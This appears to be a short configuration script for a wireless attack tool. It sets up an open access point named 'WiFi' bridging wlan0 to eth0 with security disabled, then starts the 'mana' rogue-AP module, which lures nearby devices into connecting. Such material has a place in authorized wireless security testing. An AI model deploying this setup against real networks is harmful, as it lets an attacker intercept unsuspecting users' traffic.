SET /config/core/ap_mode/3
SET /config/core/io_in_iface/wlan0
SET /config/core/io_out_iface/eth0
SET /config/core/hostapd_secure/0
SET /config/core/hostapd_ssid/WiFi
SLEEP 1
START ap
SLEEP 1
START mana